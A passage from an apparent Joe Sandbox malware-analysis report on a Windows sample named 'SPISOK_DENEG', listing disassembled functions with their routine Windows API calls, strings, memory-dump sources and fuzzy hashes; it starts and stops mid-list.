                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: CurrentDirectory
                                                            • String ID:
                                                            • API String ID: 1611563598-0
                                                            • Opcode ID: c22effb9cce3912fc43afedb86d14df723f1d4c64bceb70d300c5c55de8c00cb
                                                            • Instruction ID: 340f354684be7bec78dd6db0b5a651775572fa000c01fdc6e05c5fe1b1512901
                                                            • Opcode Fuzzy Hash: c22effb9cce3912fc43afedb86d14df723f1d4c64bceb70d300c5c55de8c00cb
                                                            • Instruction Fuzzy Hash: C3A011302002008BC2000B328F0AA0EBAAAAFA2B00F00C028A08080030CB30C8A0AA00
                                                            Function 000D9620 Relevance: 1.3, APIs: 1, Instructions: 30COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CloseHandle.KERNELBASE(000000FF,?,?,000D95D6,?,?,?,?,?,00102641,000000FF), ref: 000D963B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: CloseHandle
                                                            • String ID:
                                                            • API String ID: 2962429428-0
                                                            • Opcode ID: 1fdc88f8d8be7959f4fa839979ae0219f2e7f14299c8c53a2238a6659dacc4d7
                                                            • Instruction ID: 1efeead05c36704f7d805f4e738a4303ecdd58c7a0fd3b43f0fa02cf2e04ef1f
                                                            • Opcode Fuzzy Hash: 1fdc88f8d8be7959f4fa839979ae0219f2e7f14299c8c53a2238a6659dacc4d7
                                                            • Instruction Fuzzy Hash: 24F08970485B159FDB308A24C458792B7E86B12331F045B5FE0F742AE0D761A5CD8B60

                                                            Non-executed Functions

                                                            Function 000EC220 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 286timewindowfileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 000D1316: GetDlgItem.USER32(00000000,00003021), ref: 000D135A
                                                              • Part of subcall function 000D1316: SetWindowTextW.USER32(00000000,001035F4), ref: 000D1370
                                                            • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 000EC2B1
                                                            • EndDialog.USER32(?,00000006), ref: 000EC2C4
                                                            • GetDlgItem.USER32(?,0000006C), ref: 000EC2E0
                                                            • SetFocus.USER32(00000000), ref: 000EC2E7
                                                            • SetDlgItemTextW.USER32(?,00000065,?), ref: 000EC321
                                                            • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 000EC358
                                                            • FindFirstFileW.KERNEL32(?,?), ref: 000EC36E
                                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 000EC38C
                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 000EC39C
                                                            • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 000EC3B8
                                                            • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 000EC3D4
                                                            • _swprintf.LIBCMT ref: 000EC404
                                                              • Part of subcall function 000D4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 000D40A5
                                                            • SetDlgItemTextW.USER32(?,0000006A,?), ref: 000EC417
                                                            • FindClose.KERNEL32(00000000), ref: 000EC41E
                                                            • _swprintf.LIBCMT ref: 000EC477
                                                            • SetDlgItemTextW.USER32(?,00000068,?), ref: 000EC48A
                                                            • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 000EC4A7
                                                            • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 000EC4C7
                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 000EC4D7
                                                            • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 000EC4F1
                                                            • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 000EC509
                                                            • _swprintf.LIBCMT ref: 000EC535
                                                            • SetDlgItemTextW.USER32(?,0000006B,?), ref: 000EC548
                                                            • _swprintf.LIBCMT ref: 000EC59C
                                                            • SetDlgItemTextW.USER32(?,00000069,?), ref: 000EC5AF
                                                              • Part of subcall function 000EAF0F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 000EAF35
                                                              • Part of subcall function 000EAF0F: GetNumberFormatW.KERNEL32(00000400,00000000,?,0010E72C,?,?), ref: 000EAF84
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                                                            • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                                                            • API String ID: 797121971-1840816070
                                                            • Opcode ID: 622b6cd1cbe82a2afbf6f61eba2f2b41ecd376bdbdfe680b4c20546b72ae5a9d
                                                            • Instruction ID: 3e46f3cd749c66ea9d14292b478b46cd522425135a26e6ad62831eb63bd953c3
                                                            • Opcode Fuzzy Hash: 622b6cd1cbe82a2afbf6f61eba2f2b41ecd376bdbdfe680b4c20546b72ae5a9d
                                                            • Instruction Fuzzy Hash: 32917372248388BFE2219BA1CC49FFB77ECEB49700F044819F785D6581D775AA458B72
                                                            Function 000D6FAA Relevance: 28.3, APIs: 12, Strings: 4, Instructions: 328fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 000D6FAA
                                                            • _wcslen.LIBCMT ref: 000D7013
                                                            • _wcslen.LIBCMT ref: 000D7084
                                                              • Part of subcall function 000D7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 000D7AAB
                                                              • Part of subcall function 000D7A9C: GetLastError.KERNEL32 ref: 000D7AF1
                                                              • Part of subcall function 000D7A9C: CloseHandle.KERNEL32(?), ref: 000D7B00
                                                              • Part of subcall function 000DA1E0: DeleteFileW.KERNELBASE(000000FF,?,?,000D977F,?,?,000D95CF,?,?,?,?,?,00102641,000000FF), ref: 000DA1F1
                                                              • Part of subcall function 000DA1E0: DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,000D977F,?,?,000D95CF,?,?,?,?,?,00102641), ref: 000DA21F
                                                            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 000D7139
                                                            • CloseHandle.KERNEL32(00000000), ref: 000D7155
                                                            • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 000D7298
                                                              • Part of subcall function 000D9DA2: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,000D73BC,?,?,?,00000000), ref: 000D9DBC
                                                              • Part of subcall function 000D9DA2: SetFileTime.KERNELBASE(?,?,?,?), ref: 000D9E70
                                                              • Part of subcall function 000D9620: CloseHandle.KERNELBASE(000000FF,?,?,000D95D6,?,?,?,?,?,00102641,000000FF), ref: 000D963B
                                                              • Part of subcall function 000DA4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,000DA325,?,?,?,000DA175,?,00000001,00000000,?,?), ref: 000DA501
                                                              • Part of subcall function 000DA4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,000DA325,?,?,?,000DA175,?,00000001,00000000,?,?), ref: 000DA532
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: File$CloseHandle$AttributesCreateDelete_wcslen$BuffersCurrentErrorFlushH_prologLastProcessTime
                                                            • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                            • API String ID: 3983180755-3508440684
                                                            • Opcode ID: 4044368c459def41f5a95a705a604aa1a526a7489bf06a982a82e1eff5db0c8e
                                                            • Instruction ID: 66412d23d5fce0b29a41bdd4bd1002c046d76c3d314d9a8e0a5d1bff45e83638
                                                            • Opcode Fuzzy Hash: 4044368c459def41f5a95a705a604aa1a526a7489bf06a982a82e1eff5db0c8e
                                                            • Instruction Fuzzy Hash: B7C19471904748AADB25DB74DC41FEEB7ACAF04300F00455BFA5AA7382E775AB848B71
                                                            Function 000FD8EE Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: __floor_pentium4
                                                            • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                            • API String ID: 4168288129-2761157908
                                                            • Opcode ID: 59a1b1d010dadcf19bb61b7cb1279d99f2b59adfd5022f2d5d95e65626c8e968
                                                            • Instruction ID: 5c4a09e02d43b38dbd3dc61fe0c8aa945096ecb095a76761dc7131476fc2a3a5
                                                            • Opcode Fuzzy Hash: 59a1b1d010dadcf19bb61b7cb1279d99f2b59adfd5022f2d5d95e65626c8e968
                                                            • Instruction Fuzzy Hash: 7FC24771E0826C8FDB65CE28DD407EAB3B5EB84304F1441EADA4DE7651E774AE81AF40
                                                            Function 000D32F7 Relevance: 9.4, APIs: 2, Strings: 3, Instructions: 608COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: H_prolog_swprintf
                                                            • String ID: CMT$h%u$hc%u
                                                            • API String ID: 146138363-3282847064
                                                            • Opcode ID: 995a312bd4c4cac218a10ef34b44be459964d4205aaba9f2033af5205c484113
                                                            • Instruction ID: 06575569ea4e08c806cb71024eece40ef93c67fd9bd755a0e6a0530eea8a650a
                                                            • Opcode Fuzzy Hash: 995a312bd4c4cac218a10ef34b44be459964d4205aaba9f2033af5205c484113
                                                            • Instruction Fuzzy Hash: 06329071514385ABEB18DF74C895AEA3BA5AF15300F04447EFD8A8B383DB74A649CB31
                                                            Function 000D286B Relevance: 7.8, APIs: 3, Strings: 1, Instructions: 798COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 000D2874
                                                            • _strlen.LIBCMT ref: 000D2E3F
                                                              • Part of subcall function 000E02BA: __EH_prolog.LIBCMT ref: 000E02BF
                                                              • Part of subcall function 000E1B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,000DBAE9,00000000,?,?,?,00010480), ref: 000E1BA0
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000D2F91
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: H_prolog$ByteCharMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
                                                            • String ID: CMT
                                                            • API String ID: 1206968400-2756464174
                                                            • Opcode ID: 3685fa3a9bc23f668e77ce9a85fbf5be1f92d332fbd2c48f291b9305241a555b
                                                            • Instruction ID: b71abac4eff5c40701c56b89516cca675760228741a4dd8b480e77ce3b59e0e3
                                                            • Opcode Fuzzy Hash: 3685fa3a9bc23f668e77ce9a85fbf5be1f92d332fbd2c48f291b9305241a555b
                                                            • Instruction Fuzzy Hash: 4862E1719003458FDB19DF24C896AEA7BA1AF64310F08447FED9A8B383DB759945CB70
                                                            Function 000EF838 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 000EF844
                                                            • IsDebuggerPresent.KERNEL32 ref: 000EF910
                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 000EF930
                                                            • UnhandledExceptionFilter.KERNEL32(?), ref: 000EF93A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                            • String ID:
                                                            • API String ID: 254469556-0
                                                            • Opcode ID: 61f58430e1beb7b28a8a5db929c765b25bd995efe4ffe29a11d250db81036aff
                                                            • Instruction ID: a9d04f6bb25f2a980ee9262ac4d4d2b74c703848aa6781ab6ed7ae1e018e5212
                                                            • Opcode Fuzzy Hash: 61f58430e1beb7b28a8a5db929c765b25bd995efe4ffe29a11d250db81036aff
                                                            • Instruction Fuzzy Hash: 0F312975D0521D9FDB21DFA5D9897CCBBF8AF08304F1040AAE44CAB251EBB19B848F45
                                                            Function 000EE6A3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • VirtualQuery.KERNEL32(80000000,000EE5E8,0000001C,000EE7DD,00000000,?,?,?,?,?,?,?,000EE5E8,00000004,00131CEC,000EE86D), ref: 000EE6B4
                                                            • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,000EE5E8,00000004,00131CEC,000EE86D), ref: 000EE6CF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: InfoQuerySystemVirtual
                                                            • String ID: D
                                                            • API String ID: 401686933-2746444292
                                                            • Opcode ID: 6b47be282f15a79cc7cb8bff183c034ea369d18be8846ec1581950ce0b12f0ed
                                                            • Instruction ID: 8718c92555e820bd481388b66b0e093fa3a47408c90242f43687bd6c0be84244
                                                            • Opcode Fuzzy Hash: 6b47be282f15a79cc7cb8bff183c034ea369d18be8846ec1581950ce0b12f0ed
                                                            • Instruction Fuzzy Hash: B201F73260014D6BDB14DE29DC09BDE7BEAAFC4324F0CC120ED99E7154D634D9458680
                                                            Function 000F8EBD Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 000F8FB5
                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 000F8FBF
                                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 000F8FCC
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                            • String ID:
                                                            • API String ID: 3906539128-0
                                                            • Opcode ID: eef373cc08acbd7a06bf15d521c1ea759dffa44a640374167dbd48dcc80d60e4
                                                            • Instruction ID: 72a6cd7387ff1cf3cac6f97ef3212a6d04212899fceef03a4f3d3ae900e59958
                                                            • Opcode Fuzzy Hash: eef373cc08acbd7a06bf15d521c1ea759dffa44a640374167dbd48dcc80d60e4
                                                            • Instruction Fuzzy Hash: C931D27590122DABCB21DF65DC88BDCBBB8AF08310F5041EAE41CA7261EB709F858F44
                                                            Function 000FD440 Relevance: 3.5, APIs: 2, Instructions: 464COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                                                            • Instruction ID: a25b6c5a9c2aa35ed587409a29ade66e622c37f3139867d68e0ede3c72b20673
                                                            • Opcode Fuzzy Hash: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                                                            • Instruction Fuzzy Hash: 83022E71E002199FDF14DFA9C8806ADB7F2EF88314F25426AD919EB780D731AD41DB90
                                                            Function 000EAF0F Relevance: 3.0, APIs: 2, Instructions: 45COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 000EAF35
                                                            • GetNumberFormatW.KERNEL32(00000400,00000000,?,0010E72C,?,?), ref: 000EAF84
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: FormatInfoLocaleNumber
                                                            • String ID:
                                                            • API String ID: 2169056816-0
                                                            • Opcode ID: 0bfe27dd009abd61d50280c1eb6e353bcabcbb7ad401454c00dec78667bb64e8
                                                            • Instruction ID: 766fb9f72ec892f5d732150331f3bc7208f2e7e4e68ad79f99a5a00e0e9a2b1d
                                                            • Opcode Fuzzy Hash: 0bfe27dd009abd61d50280c1eb6e353bcabcbb7ad401454c00dec78667bb64e8
                                                            • Instruction Fuzzy Hash: 06017C7A100348BAD7119FB5EC45F9AB7FCFF09710F008426FA45A7190E3B0A965CBA5
                                                            Function 000D6C74 Relevance: 3.0, APIs: 2, Instructions: 16windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLastError.KERNEL32(000D6DDF,00000000,00000400), ref: 000D6C74
                                                            • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 000D6C95
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: ErrorFormatLastMessage
                                                            • String ID:
                                                            • API String ID: 3479602957-0
                                                            • Opcode ID: 73848daf1fbaa5bbba33aeabca5d576a38a7e9c8aa8fbb2a245bc7a3ceedff6b
                                                            • Instruction ID: 67b15ee09450cbd89e3b1eaae3604def4c957eb09ed33d9f541952adda02e5eb
                                                            • Opcode Fuzzy Hash: 73848daf1fbaa5bbba33aeabca5d576a38a7e9c8aa8fbb2a245bc7a3ceedff6b
                                                            • Instruction Fuzzy Hash: 46D0C931385300BFFA510BA18D06F2ABB9DBF45B51F18D405B7A5E84E0CAB59464A629
                                                            Function 001019F4 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,001019EF,?,?,00000008,?,?,0010168F,00000000), ref: 00101C21
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: ExceptionRaise
                                                            • String ID:
                                                            • API String ID: 3997070919-0
                                                            • Opcode ID: 3632c5a13e5dd59c3440495884aca6394d6e4c28c5e646c957f942dac415ef5e
                                                            • Instruction ID: b3928526dfa80d37f74ba4955fb762ce3309bad750740b5633ceda5a01ba9534
